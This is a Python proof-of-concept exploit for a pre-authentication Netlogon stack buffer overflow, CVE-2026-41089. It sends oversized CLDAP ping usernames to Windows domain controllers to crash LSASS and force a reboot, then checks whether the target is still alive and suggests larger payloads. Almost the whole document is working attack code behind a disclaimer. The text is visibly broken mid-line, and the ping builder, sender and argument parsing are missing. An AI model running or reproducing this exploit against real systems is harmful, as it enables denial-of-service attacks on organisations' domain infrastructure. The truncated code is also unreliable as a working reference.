# DISCLAIMER: This proof-of-concept is provided for educational and authorized # security research purposes only. The author(s) accept no responsibility or # liability for any misuse, damage, or loss caused by the use of this code. # Use at your own risk. """ CVE-2026-41089 PoC - Netlogon Stack Buffer Overflow via CLDAP Ping =================================================================== Sends a CLDAP (Connectionless LDAP over UDP 389) DC locator ping request with an oversized username to trigger a stack buffer overflow in netlogon!NetpLogonPutUnicodeString -> netlogon!BuildSamLogonResponse. The vulnerable code path: I_NetLogonLdapLookupEx -> NlGetLocalPingResponse -> LogonRequestHandler -> BuildSamLogonResponse -> NetpLogonPutUnicodeString NlGetLocalPingResponse allocates a 528-byte stack buffer (Src[528]) and passes it to BuildSamLogonResponse. BuildSamLogonResponse calls NetpLogonPutUnicodeString multiple times to write Unicode strings into this buffer without bounds checking. The root cause: the maximum string length passed to NetpLogonPutUnicodeString was interpreted as bytes but treated as WCHARs, doubling the effective write. The "User" field in the CLDAP filter is attacker-controlled (up to 130 wchars). Combined with server name, domain name, GUIDs, and DNS names, the total write exceeds 528 bytes and overflows the stack. Target: Windows Server 2012 through 2025 Domain Controllers (pre-patch) Impact: LSASS crash -> DC reboot (~60 seconds). RCE possible but not demonstrated. Attack vector: UDP port 389 (CLDAP), pre-authentication, no credentials needed CVE: CVE-2026-41089, CVSS 9.8 CRITICAL, CWE-121 Published: May 12, 2026 by Microsoft (found internally) """ import argparse import socket import struct import sys import time # --------------------------------------------------------------------------- # BER/DER encoding primitives # --------------------------------------------------------------------------- def encode_ber_length(length): """Encode a BER length field (X.690 8.1.3).""" if length < 0x80: return bytes([length]) elif length < 0x100: return bytes([0x81, length]) elif length < 0x10000: return bytes([0x82, (length >> 8) & 0xFF, length & 0xFF]) else: return bytes([0x83, (length >> 16) & 0xFF, (length >> 8) & 0xFF, length & 0xFF]) def encode_ber_int(value): """Encode a BER INTEGER (tag 0x02).""" if value < 0: raise ValueError(f"Negative integers not supported: {value}") if value == 0: payload = b'\x00' elif value < 0x80: payload = bytes([value]) elif value < 0x100: # Leading zero to avoid high-bit being read as sign (X.690 8.3.2) payload = bytes([0x00, value]) elif value < 0x10000: payload = struct.pack('>H', value) else: payload = struct.pack('>I', value) return bytes([0x02]) + encode_ber_length(len(payload)) + payload def encode_ber_enum(value): """Encode a BER ENUMERATED (tag 0x0a).""" if value < 0: raise ValueError(f"Negative enum not supported: {value}") if value == 0: payload = b'\x00' elif value < 0x80: payload = bytes([value]) elif value < 0x100: payload = bytes([0x00, value]) else: payload = struct.pack('>H', value) return bytes([0x0a]) + encode_ber_length(len(payload)) + payload def encode_ber_string(tag, value): """Encode a tagged string (OCTET STRING, UTF8String, etc.).""" if isinstance(value, str): value = value.encode('utf-8') return bytes([tag]) + encode_ber_length(len(value)) + value def encode_ber_sequence(tag, contents): """Encode a SEQUENCE/SET with a given tag.""" return bytes([tag]) + encode_ber_length(len(contents)) + contents # --------------------------------------------------------------------------- # LDAP filter construction # --------------------------------------------------------------------------- def build_equality_filter(attr_name, attr_value): """Build an LDAP equalityMatch filter: (attr=value). Tag 0xA3 = context class, constructed, tag number 3. """ attr_bytes = attr_name.encode('utf-8') if isinstance(attr_value, str): val_bytes = attr_value.encode('utf-8') else: val_bytes = attr_value content = encode_ber_string(0x04, attr_bytes) + encode_ber_string(0x04, val_bytes) return encode_ber_sequence(0xA3, content) # --------------------------------------------------------------------------- # CLDAP DC Locator Ping # --------------------------------------------------------------------------- def build_cldap_ping(target_domain, username, ntver=0x00000016): """Build a CLDAP DC locator ping (LDAP SearchRequest over UDP). Filter: (&(DnsDomain=)(User=)(NtVer=)) Per MS-ADTS 6.3.3.2 / RFC 4511 Section 4.5.1. """ # NtVer: 4-byte little-endian flag ntver_bytes = struct.pack('= 1", file=sys.stderr) sys.exit(1) username = "A" * args.length print("=" * 60) print("CVE-2026-41089 - Netlogon Stack Buffer Overflow PoC") print("=" * 60) print() print(f" Target: {args.target_ip}:{args.port}") print(f" Domain: {args.domain_name}") print(f" Username: {args.length} chars ({args.length * 2} bytes as UTF-16)") print(f" Timeout: {args.timeout}s") print() # Phase 1: connectivity check print("[1/3] Sending normal CLDAP ping (short username)...") resp = send_cldap_ping( args.target_ip, args.domain_name, "testuser", port=args.port, timeout=args.timeout, ) if resp is None: print("[-] No response. DC is not reachable on UDP 389.") print(" Verify the target is a domain controller and the port is open.") sys.exit(1) print(f"[+] DC responded ({len(resp)} bytes). Target is alive.") print() # Phase 2: send overflow print(f"[2/3] Sending overflow payload (username={args.length} chars)...") try: resp = send_cldap_ping( args.target_ip, args.domain_name, username, port=args.port, timeout=args.timeout, ) except KeyboardInterrupt: print("\n[!] Interrupted.") sys.exit(130) if resp is None: print("[!] No response. LSASS may have crashed.") else: print(f"[+] Got response ({len(resp)} bytes). Target processed the packet.") # Give LSASS time to crash before the liveness check print(f" Waiting {args.delay}s before liveness check...") try: time.sleep(args.delay) except KeyboardInterrupt: print("\n[!] Interrupted.") sys.exit(130) print() # Phase 3: liveness check print("[3/3] Liveness check...") resp = send_cldap_ping( args.target_ip, args.domain_name, "testuser", port=args.port, timeout=args.timeout, ) if resp is None: print("[!] DC is not responding. LSASS likely crashed. Expect reboot in ~60s.") else: print(f"[+] DC responded ({len(resp)} bytes). Still alive.") if args.length < 200: print(f" Try a larger payload: -l {min(args.length + 50, 500)}") if __name__ == "__main__": main()